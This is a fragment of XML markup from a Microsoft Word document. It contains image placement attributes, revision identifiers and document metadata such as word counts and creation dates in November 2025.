          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="682D1B46" wp14:editId="273C7216">
            <wp:extent cx="4648439" cy="1644735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17405345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34514" name="Picture 17405345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A0"/>
    <w:rsid w:val="002A3E19"/>
    <w:rsid w:val="00323770"/>
    <w:rsid w:val="00481FE1"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00644BF4"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00AA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07685"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3F56E5CE-A6F0-4A4F-857E-CF410E3D7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526</Words>
  <Characters>2898</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>263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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-13T07:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-13T07:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>